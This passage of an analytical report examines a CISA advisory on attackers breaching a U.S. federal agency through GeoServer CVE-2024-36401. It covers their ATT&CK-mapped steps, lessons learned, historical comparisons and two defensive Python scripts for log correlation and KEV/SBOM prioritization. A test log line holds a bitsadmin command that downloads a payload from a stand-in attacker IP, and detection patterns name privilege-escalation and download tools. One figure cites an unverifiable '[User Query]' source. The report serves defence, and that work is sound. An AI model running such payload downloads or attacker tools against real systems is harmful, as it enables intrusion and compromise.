The Attacker's Playbook: Tactics, Techniques, and Procedures (TTPs)
CISA's advisory provides a granular, technical breakdown of the threat actor's actions, offering a valuable playbook for network defenders. The attacker's TTPs represent a calculated blend of widely available commodity tools and more sophisticated, multi-stage techniques.
The attack unfolded in a series of logical steps, each mapping to a specific Tactic in the MITRE ATT&CK framework.
Reconnaissance: The threat actors began by scanning the FCEB agency's public-facing GeoServer instances. CISA's analysis of web logs revealed signatures associated with Burp Suite's Burp Scanner, a common web vulnerability assessment tool [1]. This activity, originating from the same IP address later used for the exploit, confirms a targeted reconnaissance effort [1]. This maps to MITRE ATT&CK Tactic: T1595.002, "Active Scanning."
Initial Access: The attackers exploited CVE-2024-36401 on two separate GeoServer instances to gain RCE via "eval injection" [1]. This action, which provided the initial foothold in the network, maps to Tactic: T1190, "Exploit Public-Facing Application."
Persistence: Once inside, the actors worked to ensure they could maintain access to the network. They established persistence primarily through web shells (such as the China Chopper web shell) on internet-facing hosts, created cron jobs, and manipulated valid accounts, including creating and later deleting new accounts [1]. This maps to Tactic: TA0003, "Persistence."
Privilege Escalation: To expand their control, the attackers attempted to escalate privileges using the publicly available dirtycow tool, which targets a separate vulnerability, CVE-2016-5195 [1]. This is an example of an attacker using a known, unpatched kernel-level flaw to elevate their permissions, a common post-exploitation technique. This maps to Tactic: T1068, "Exploitation for Privilege Escalation."
Discovery: With an initial foothold and elevated privileges, the actors began to map the internal network. They executed a range of host discovery commands, including uname -a, df -h, env, ps -aux, and ipconfig [1]. They also used the open-source tools fscan and linux-exploit-suggester2.pl to scan internal systems for further compromise opportunities [1]. This maps to Tactic: TA0007, "Discovery."
Lateral Movement: The attackers used the compromised GeoServer 1 as a launchpad to move laterally to a web server and then to an SQL server [1]. This was accomplished by enabling xp_cmdshell for RCE on GeoServer 1, demonstrating a seamless transition between external and internal assets [1]. This maps to Tactic: TA0008, "Lateral Movement."
Command and Control (C2): The threat actors used standard living-off-the-land tools like PowerShell and bitsadmin getfile to download additional payloads [1]. For C2 communication, they established a connection using Stowaway, a multi-level proxy tool designed to bypass intranet restrictions [1]. They also established a second C2 connection as a backup, a clear indication of a resilient and persistent attack strategy [1]. This maps to Tactic: TA0011, "Command and Control."
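The chain above can be checked against telemetry rather than read as a narrative. The following Python script is an added example, not code from the CISA advisory or from this article: it parses constructed web-server and host log lines, tags each matching event with the ATT&CK ID cited in the corresponding step, and tests the two correlations the advisory's account rests on: scanner traffic and the later exploit alert sharing one source IP, and discovery, privilege escalation, persistence and payload-download activity following the exploit on the affected hosts. All log lines, IP addresses, hostnames, the IDS alert text and the scanner user-agent heuristic are constructed placeholders.

```python
"""Reconstruct an intrusion chain from web and host log lines.

Added example, not code from the CISA advisory or this article. The log
formats, IPs, hostnames, IDS alert text and the scanner user-agent
heuristic below are constructed placeholders.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timezone

# Constructed combined-format access log. "burp" is a placeholder
# heuristic; real scanner fingerprints come from your signature set.
WEB_LOG = """\
203.0.113.7 - - [09/Jul/2024:10:01:12 +0000] "GET /geoserver/web/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Burp)"
203.0.113.7 - - [09/Jul/2024:10:01:13 +0000] "GET /geoserver/wfs?request=GetCapabilities HTTP/1.1" 200 48211 "-" "Mozilla/5.0 (compatible; Burp)"
198.51.100.4 - - [10/Jul/2024:08:15:00 +0000] "GET /geoserver/wms?request=GetCapabilities HTTP/1.1" 200 30917 "-" "QGIS/3.34"
"""

# Constructed host telemetry export: "<iso-ts> <host> <kind>: <message>".
HOST_LOG = """\
2024-07-11T03:22:41Z geoserver1 ids: CVE-2024-36401 exploit attempt from 203.0.113.7
2024-07-11T03:30:05Z geoserver1 cmd: "uname -a"
2024-07-11T03:30:09Z geoserver1 cmd: "ps -aux"
2024-07-11T03:35:00Z geoserver1 cmd: "./dirtycow"
2024-07-11T03:41:00Z geoserver1 useradd: new user: name=svc_backup
2024-07-11T03:42:10Z geoserver1 cron: new job /etc/cron.d/update-check
2024-07-12T01:05:00Z webserver1 cmd: "bitsadmin /transfer upd http://203.0.113.7/u.bin C:\\Temp\\u.bin"
"""

WEB_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
HOST_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<kind>\w+): (?P<msg>.*)$")
SCANNER_UA = re.compile(r"burp|nikto|nuclei", re.I)          # placeholder heuristic
DISCOVERY_CMDS = {"uname -a", "df -h", "env", "ps -aux", "ipconfig"}  # from the advisory
DOWNLOAD_RE = re.compile(r"^(bitsadmin\s+/transfer|powershell|certutil)", re.I)
POST_EXPLOIT = {"TA0007", "T1068", "TA0003", "TA0011"}


@dataclass
class Event:
    ts: datetime
    actor: str        # source IP for network events, hostname for host events
    technique: str    # ATT&CK ID as cited in the walkthrough
    detail: str


def parse_web(text):
    """Flag requests whose user-agent matches the scanner heuristic (T1595.002)."""
    events = []
    for line in text.splitlines():
        m = WEB_RE.match(line)
        if m and SCANNER_UA.search(m["ua"]):
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            events.append(Event(ts, m["ip"], "T1595.002", m["ua"]))
    return events


def parse_host(text):
    """Tag IDS alerts, discovery/priv-esc/download commands and persistence events."""
    events = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        host, kind, msg = m["host"], m["kind"], m["msg"]
        if kind == "ids" and "CVE-2024-36401" in msg:
            events.append(Event(ts, msg.rsplit(" ", 1)[-1], "T1190", msg))
        elif kind == "cmd":
            cmd = msg.strip('"')
            if cmd in DISCOVERY_CMDS:
                events.append(Event(ts, host, "TA0007", cmd))
            elif "dirtycow" in cmd:
                events.append(Event(ts, host, "T1068", cmd))
            elif DOWNLOAD_RE.match(cmd):
                events.append(Event(ts, host, "TA0011", cmd))
        elif kind in ("useradd", "cron"):
            events.append(Event(ts, host, "TA0003", f"{kind}: {msg}"))
    return events


def correlate(events):
    """Order events and test the recon-to-exploit and post-exploitation links."""
    events = sorted(events, key=lambda e: e.ts)
    recon_ips = {e.actor for e in events if e.technique == "T1595.002"}
    exploits = [e for e in events if e.technique == "T1190"]
    first = exploits[0].ts if exploits else None
    post = [e for e in events if first and e.ts > first and e.technique in POST_EXPLOIT]
    return {
        "tactics_seen": [e.technique for e in events],
        "first_exploit": first.isoformat() if first else None,
        "recon_then_exploit_same_ip": sorted({e.actor for e in exploits if e.actor in recon_ips}),
        "post_exploitation_events": len(post),
        "hosts_with_post_exploitation": sorted({e.actor for e in post}),
    }


if __name__ == "__main__":
    for key, value in correlate(parse_web(WEB_LOG) + parse_host(HOST_LOG)).items():
        print(f"{key}: {value}")
```

Two hosts showing post-exploitation activity after a single exploit alert is the lateral-movement signal the advisory describes; in a real deployment the same correlation would run over centralized logs so that a web shell on the first host cannot erase the evidence.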
The TTPs employed in this incident reveal a fascinating duality. The initial breach was enabled by a fundamental, widely-known vulnerability, which attackers identified using a common, off-the-shelf scanner. However, once inside, the actors did not rely on simple, one-off attacks. They deployed sophisticated, multi-stage tactics to establish persistence and evade detection. This blend of commodity exploitation and professional-grade post-compromise activity highlights a crucial development in the threat landscape: the barrier to entry for gaining initial access has been lowered, allowing a wider range of threat actors to execute campaigns that quickly escalate in sophistication.
6. A Global Threat: The Widespread Exploitation of GeoServer
The breach of the FCEB agency was not an isolated, targeted incident but rather a single point of success within a much broader, global wave of opportunistic exploitation. Data from multiple threat intelligence services confirms the pervasive nature of the threat surface. OSINT search engine ZoomEye tracked over 16,000 GeoServer servers exposed online [User Query]. Separately, Cortex Xpanse reported 7,126 publicly exposed GeoServer instances across 99 countries in March and April 2025, a number that decreased slightly to 3,706 by May 2025 [11]. On July 24, 2024, the Shadowserver Foundation, a security analyst organization, identified 6,635 instances that were likely vulnerable to CVE-2024-36401 [6]. This extensive attack surface highlights a fundamental and widespread vulnerability that transcends geographical and industry boundaries.
The diverse nature of the malicious payloads delivered and the motivations behind the attacks further demonstrate the commoditization of this exploit. Threat researchers have observed multiple campaigns targeting the vulnerability to spread a variety of malware. These include botnet families such as Mirai variants (JenX, gayfemboy) and PolarEdge [10]. Other attackers have deployed cryptominers and tools for clandestine income generation that monetize compromised systems' internet bandwidth and processing power [10]. Additional backdoors like Goreverse and SideWalk have also been observed [14]. Fortinet research has noted that SideWalk, a sophisticated Linux backdoor, is linked to the Chinese state-sponsored group APT41 [14]. This attribution suggests that while the exploit is widely available and used by common cybercriminals, it is also being leveraged by advanced, state-backed actors for espionage purposes [16].
The global distribution of these attacks underscores an opportunistic and far-reaching threat landscape. Researchers have observed exploitation attempts targeting IT service providers in India, government entities in Belgium, technology companies in the U.S., and telecommunications firms in Brazil and Thailand [14]. This lack of concentration in a single region or industry suggests that attackers are indiscriminately scanning the internet for any exposed, vulnerable asset. The FCEB breach was therefore not a unique event but a specific and successful instance of a widespread, automated campaign. This global context is crucial for understanding that even organizations with robust security protocols can be put at risk simply by having a publicly exposed, unpatched server.
7. CISA's Verdict: Lessons Learned and Strategic Failures
In its official advisory, CISA provided a detailed analysis of the incident, identifying three key failures that allowed a known vulnerability to become a successful network compromise [1]. These findings serve as critical lessons for all organizations, highlighting systemic weaknesses that extend beyond a single breach.
Vulnerabilities Not Promptly Remediated: The most direct failure was the agency's inability to patch its GeoServer instances in a timely manner [1]. The vulnerability was publicly disclosed on June 30, 2024, yet the first server was breached on July 11, and a second on July 24 [1]. This was despite the fact that CISA added the vulnerability to its KEV Catalog on July 15, which, under Binding Operational Directive (BOD) 22-01, established an August 5 deadline for remediation [1]. The breach occurred before this deadline, demonstrating that even with a clear, mandatory directive, the operational challenges of timely remediation remain significant.
Untested Incident Response Plan (IRP): The agency's IRP was found to be inadequate and untested [1]. It lacked clear procedures for engaging and granting access to third parties, which delayed CISA's response efforts [1]. For example, CISA had to go through the agency's change control board process to deploy its own EDR agents, an administrative hurdle that could have been identified and resolved through a simple tabletop exercise [1]. This failure reveals a critical gap between a theoretical plan and the operational reality of a crisis.
Inadequate Monitoring and Protection: The malicious activity went undetected for approximately three weeks after the initial compromise [1]. The agency missed an opportunity for earlier detection, as an alert from GeoServer 1 was not observed [1]. Furthermore, a public-facing web server, which the attackers later moved to, lacked any form of endpoint protection [1]. These lapses in continuous monitoring and a lack of universal endpoint protection created a blind spot that allowed the attackers to operate freely and move laterally without triggering an immediate alarm.
The CISA advisory makes a strong case that the breach was not caused by a single, catastrophic failure but by a combination of breakdowns in foundational security practices. The lack of a rapid patching program, an untested IRP, and poor EDR monitoring created a perfect storm, allowing a relatively simple exploit to metastasize into a successful network compromise with lateral movement and established persistence. This highlights the importance of a holistic and integrated security program, where all components—from vulnerability management to incident response—are robust and integrated to protect against the full lifecycle of an attack.
8. Comparison to Past Breaches: Recurring Themes in Government Compromises
The GeoServer incident, while unique in its technical specifics, shares a number of recurring themes with past major cyberattacks on the U.S. government. By contextualizing this breach within a historical perspective, a pattern of persistent, fundamental security failures becomes apparent.
OPM Breach (2015): The Office of Personnel Management (OPM) breach exposed the sensitive data of over 22 million current and former federal employees [18]. The OPM breach was a stark lesson in the catastrophic consequences of lax data security and access controls [19]. While the GeoServer breach's focus was on network access and lateral movement rather than a single, massive data exfiltration event, both incidents underscore the vulnerability of government agencies to sophisticated threats, whether from state-sponsored actors or criminal syndicates [18].
SolarWinds Supply Chain Attack (2020): This incident highlighted the profound risk of supply chain vulnerabilities, where malicious code was injected into legitimate software updates [18]. While the GeoServer breach was an exploitation of a known flaw rather than a sophisticated zero-day, it still exposed a critical software supply chain weakness in the form of a vulnerable underlying library [3]. The lesson from both is that an organization's security posture is only as strong as its weakest link, whether that link is a third-party vendor or a foundational open-source library.
Colonial Pipeline Ransomware Attack (2021): This attack exposed the vulnerability of critical infrastructure to ransomware, shutting down the largest fuel pipeline in the United States [18]. The initial entry point was reportedly an inactive VPN account that lacked multi-factor authentication [21]. This is perhaps the most relevant comparison to the GeoServer breach. Neither incident was the result of a novel, unknown threat. Instead, both were successful exploits of known, unpatched vulnerabilities and a failure to enforce basic security hygiene. The Colonial Pipeline attack, like the GeoServer breach, demonstrated that a relatively simple security lapse could have cascading, multi-layered consequences that impact an entire organization's operations.
The evolution of government cyberattacks shows a clear shift. Past incidents, such as the OPM breach, were primarily focused on massive data theft. More recent incidents, including the Colonial Pipeline attack and the TTPs observed in the GeoServer breach, show a tactical shift toward operational disruption and establishing persistent footholds for a wide range of malicious activities [14]. The GeoServer attackers moved laterally from geospatial data servers to a web server and an SQL server, indicating a multifaceted objective that extends beyond simple data theft and into the realm of network control and disruption [1].
The most profound lesson from this historical comparison is the persistence of fundamental failures. Regardless of the attacker's motivation or the sophistication of their TTPs, the core weaknesses exploited remain remarkably consistent: unpatched systems, untested incident response plans, and inadequate visibility. This demonstrates that government and enterprise security are still grappling with the fundamentals of vulnerability management and incident response, even as attacker capabilities and the scale of the threat grow.
9. Actionable Guidance for Cyber Resiliency
The GeoServer breach is a pivotal case study in the consequences of neglecting foundational cybersecurity practices. It is a clarion call for a strategic re-evaluation of an organization's security posture, urging a move beyond simple compliance to a state of genuine operational resilience. Based on the analysis of this incident, the following recommendations are provided as a framework for building a more resilient cyber defense.
Prioritize an Intelligence-Driven Vulnerability Management Program: The CISA KEV Catalog is not merely a list; it is a mandate for action. Organizations must operationalize this intelligence by implementing a continuous process to identify and prioritize the remediation of KEVs, particularly on public-facing assets [22]. A "patch or perish" policy should be enforced for critical internet-accessible systems, with a rapid remediation Service Level Agreement (SLA) that accounts for the diminishing window of time between disclosure and active exploitation [1].
Develop and Exercise a Comprehensive Incident Response Plan: An IRP is a living document that must be regularly tested and refined. The agency's failure to engage CISA and provide necessary access without administrative hurdles is a testament to the importance of proactive planning [1]. The plan must clearly define roles, responsibilities, and procedures for engaging both internal teams and external partners like CISA. Tabletop exercises should be conducted at least once per year to identify and resolve these procedural gaps before a real crisis occurs [1].
Enhance Network Visibility and Endpoint Protection: The three-week detection gap and the lack of endpoint protection on a public-facing web server were critical failures [1]. All public-facing systems, regardless of their function or perceived importance, must have continuous EDR monitoring. Furthermore, logs should be centralized in an out-of-band location to ensure they cannot be tampered with or deleted by attackers during an incident [1]. Continuous review of EDR alerts and network traffic is essential to detect and respond to malicious activity in its earliest stages.
Mitigate Open-Source Supply Chain Risks: The GeoServer breach highlights the criticality of vetting and monitoring open-source dependencies. Organizations should implement Software Bill of Materials (SBOM) tooling to track vulnerabilities in their codebase and underlying libraries [9]. A formal process for monitoring security advisories from open-source projects and their foundational components must be established to address vulnerabilities before they are exploited in the wild.
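The KEV-driven prioritization and the SBOM recommendation above, together with the BOD 22-01 timeline described in section 7, can be automated in one workflow. The following Python script is an added example, not code from this article, from CISA or from any SBOM vendor: it cross-references CycloneDX-style component lists against a KEV extract, recognising both the product itself and a vulnerable underlying library named in the KEV entry (the GeoTools case the SolarWinds comparison alludes to), and derives an internal remediation date that is tighter than the BOD due date for public-facing assets. The KEV and SBOM records, asset names, component versions and the seven-day internal SLA are constructed assumptions; only the CVE-2024-36401 dates (added to KEV July 15, 2024, due August 5, 2024) follow the article.

```python
"""Cross-reference SBOM components against a KEV extract and compute
remediation deadlines under BOD 22-01.

Added example, not code from the article, CISA or any SBOM tool. The KEV
extract and SBOMs are constructed samples (KEV field names follow the
public KEV JSON feed; the SBOMs are CycloneDX-style dictionaries). The
seven-day internal SLA for public-facing assets is an assumption.
"""
import json
import re
from datetime import date, timedelta

# Constructed KEV extract. The CVE-2024-36401 dates are the ones the article
# cites; the second entry's dates are placeholders.
KEV_JSON = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2024-36401", "vendorProject": "OSGeo", "product": "GeoServer",
     "vulnerabilityName": "OSGeo GeoServer GeoTools Eval Injection Vulnerability",
     "dateAdded": "2024-07-15", "dueDate": "2024-08-05"},
    {"cveID": "CVE-2016-5195", "vendorProject": "Linux", "product": "Kernel",
     "vulnerabilityName": "Linux Kernel Race Condition Vulnerability",
     "dateAdded": "2000-01-01", "dueDate": "2000-01-22"},  # placeholder dates
]})

# Constructed CycloneDX-style SBOMs. Versions are placeholders: KEV carries
# no version ranges, so a hit means "check the vendor advisory", not "vulnerable".
ASSETS = [
    {"name": "geoserver-1", "public_facing": True, "sbom": {"components": [
        {"group": "org.geoserver", "name": "geoserver", "version": "x.y.z"},
        {"group": "org.geotools", "name": "gt-main", "version": "x.y.z"},
        {"group": "org.springframework", "name": "spring-core", "version": "x.y.z"},
    ]}},
    {"name": "gis-internal", "public_facing": False, "sbom": {"components": [
        {"group": "org.geoserver", "name": "geoserver", "version": "x.y.z"},
    ]}},
]


def load_kev(text):
    """Index a KEV JSON document by CVE ID."""
    return {v["cveID"]: v for v in json.loads(text)["vulnerabilities"]}


def _component_keys(component):
    """Names a component can be matched on: its name and its group's last segment."""
    keys = {component["name"].lower()}
    group = component.get("group", "")
    if group:
        keys.add(group.split(".")[-1].lower())
    return keys


def _kev_tokens(entry):
    """Lower-cased words from vendor, product and vulnerability name."""
    text = f"{entry['vendorProject']} {entry['product']} {entry['vulnerabilityName']}"
    return {t for t in re.split(r"[^a-z0-9]+", text.lower()) if t}


def match_sbom(sbom, kev):
    """Return (component, kev_entry) pairs whose names overlap.

    Matching on the vulnerability name as well as the product is what lets
    an underlying library (GeoTools) surface, not only the product (GeoServer).
    """
    hits = []
    for component in sbom["components"]:
        keys = _component_keys(component)
        for entry in kev.values():
            if keys & _kev_tokens(entry):
                hits.append((component, entry))
    return hits


def remediation_plan(assets, kev, today, public_sla_days=7):
    """Build a prioritized list: BOD due date, tighter internal date, overdue flag."""
    plan = []
    for asset in assets:
        for component, entry in match_sbom(asset["sbom"], kev):
            added = date.fromisoformat(entry["dateAdded"])
            bod_due = date.fromisoformat(entry["dueDate"])
            internal_due = bod_due
            if asset["public_facing"]:
                internal_due = min(bod_due, added + timedelta(days=public_sla_days))
            plan.append({
                "asset": asset["name"],
                "component": component["name"],
                "cve": entry["cveID"],
                "bod_due": bod_due.isoformat(),
                "internal_due": internal_due.isoformat(),
                "days_until_due": (internal_due - today).days,
                "overdue": today > internal_due,
            })
    plan.sort(key=lambda row: (not row["overdue"], row["internal_due"]))
    return plan


if __name__ == "__main__":
    for row in remediation_plan(ASSETS, load_kev(KEV_JSON), date(2024, 7, 24)):
        print(row)
```

Run against the article's own timeline (today = July 24, 2024, the day the second server was breached), the public-facing asset is already two days past its internal deadline while still twelve days inside the BOD window, which is exactly the gap the "patch or perish" SLA is meant to close.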
10. Conclusion: The Path Forward
The GeoServer breach of a U.S. federal agency is a pivotal case study that encapsulates the enduring vulnerabilities of foundational security practices in the face of a rapidly evolving threat landscape. The incident was not a consequence of an advanced, nation-state-level zero-day exploit but a successful attack on a known vulnerability that was easily identified and exploited. The lessons learned from this failure—the urgency of patching, the necessity of a tested IRP, and the need for comprehensive monitoring—are not novel, but their catastrophic consequences in a federal context demand immediate and decisive action. The path forward requires a strategic commitment to proactive, intelligence-led defense, moving beyond a reactive, checklist-based approach to a posture of continuous readiness and resilience.
Works cited
[1] CISA Shares Lessons Learned from an Incident Response ..., accessed September 23, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-266a
[2] CVE-2024-36401: Vulnerability in OSGeo GeoServer GeoTools - Broadcom Inc., accessed September 23, 2025, https://www.broadcom.com/202407017-cve-2024-36401-vulnerability-in-osgeo-geoserver-geotools
[3] GeoServer RCE Vulnerability (CVE-2024-36401) Being Exploited In the Wild - SonicWall, accessed September 23, 2025, https://www.sonicwall.com/blog/geoserver-rce-vulnerability-cve-2024-36401-being-exploited-in-the-wild
[4] GeoServer, accessed September 23, 2025, https://geoserver.org/
[5] About - GeoServer, accessed September 23, 2025, https://geoserver.org/about/
[6] 6600+ Vulnerable GeoServer instances Exposed to the Internet, accessed September 23, 2025, https://cybersecuritynews.com/vulnerable-geoserver-instances-exposed/
[7] Delivering the power of location data for public sector impact - Open Access Government, accessed September 23, 2025, https://www.openaccessgovernment.org/delivering-the-power-of-location-data-for-public-sector-impact/198043/
[8] CVE-2024-36401 Detail - NVD, accessed September 23, 2025, https://nvd.nist.gov/vuln/detail/cve-2024-36401
[9] CVE-2024-36401: GeoServer RCE Vulnerability Analysis - OPSWAT, accessed September 23, 2025, https://www.opswat.com/blog/cve-2024-36401-in-open-source-geoserver-exposes-systems-to-remote-code-execution
[10] CVE-2024-36401 - CVE Details & Analysis | SOCRadar Labs CVE Radar, accessed September 23, 2025, https://socradar.io/labs/app/cve-radar/CVE-2024-36401
[11] Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell ..., accessed September 23, 2025, https://unit42.paloaltonetworks.com/attackers-sell-your-bandwidth-using-sdks/
[12] CISA says hackers breached federal agency using GeoServer exploit - Bleeping Computer, accessed September 23, 2025, https://www.bleepingcomputer.com/news/security/cisa-says-hackers-breached-federal-agency-using-geoserver-exploit/
[13] CVE-2024-36401 Remote Code Execution (RCE) vulnerability in evaluating property name expressions - GeoServer, accessed September 23, 2025, https://geoserver.org/vulnerability/2024/09/12/cve-2024-36401.html
[14] Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 ..., accessed September 23, 2025, https://www.fortinet.com/blog/threat-research/threat-actors-exploit-geoserver-vulnerability-cve-2024-36401
[15] Highlights of the Year in Review | The ... - Shadowserver 2024, accessed September 23, 2025, https://www.shadowserver.org/news/shadowserver-2024-highlights-of-the-year-in-review/
[16] Critical GeoServer Flaw Enabling Global Hack Campaigns - BankInfoSecurity, accessed September 23, 2025, https://www.bankinfosecurity.com/critical-geoserver-flaw-enabling-global-hack-campaigns-a-26225
[17] Attacks involving GeoServer exploit, botnets intensify | SC Media, accessed September 23, 2025, https://www.scworld.com/brief/attacks-involving-geoserver-exploit-botnets-intensify
[18] The Top 7 Cyberattacks on U.S. Government: A closer look at the evolving landscape of cybersecurity - SecurityScorecard, accessed September 23, 2025, https://securityscorecard.com/blog/top-cyberattacks-on-us-government/
[19] FAQs - OPM, accessed September 23, 2025, https://www.opm.gov/cybersecurity-resource-center/faqs/
[20] Cybersecurity, government experts are aghast at security failures in DOGE takeover, accessed September 23, 2025, https://cyberscoop.com/musk-doge-opm-treasury-breach/
[21] Top 5 Cyber Attacks on Government - Wire, accessed September 23, 2025, https://wire.com/en/blog/top-government-cyberattacks-lessons
[22] What is CISA KEV Known Exploited Vulnerability, and how to use it in prioritization?, accessed September 23, 2025, https://phoenix.security/what-is-cisa-kev/
[23] Known Exploited Vulnerabilities Catalog | CISA, accessed September 23, 2025, https://www.cisa.gov/known-exploited-vulnerabilities-catalog